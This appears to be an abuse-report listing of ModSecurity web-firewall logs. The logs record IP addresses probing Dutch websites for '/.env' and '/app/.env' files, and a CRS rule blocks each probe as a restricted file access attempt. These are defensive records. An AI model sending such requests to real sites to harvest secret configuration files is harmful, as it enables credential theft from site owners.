31/Mar/2026:10:18:25.929686 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "req.jordymarije.nl"] [uri "/.env"] [unique_id "acuDUZPvI9lgrWRWA2JLsgAAAA8"]
31/Mar/2026:10:18:25.929686 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"]
...
show less
|
Web App Attack
|
|
π³π±
213.177.179.113
|
|
31/Mar/2026:09:21:04.699876 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:09:21:04.699876 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 213.177.179.113] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "familievandemaat.nl"] [uri "/app/.env"] [unique_id "act14DlugprcptxyAbccdQAAAAQ"]
31/Mar/2026:09:21:04.699876 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 213.177.179.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVAL
...
show less
|
Web App Attack
|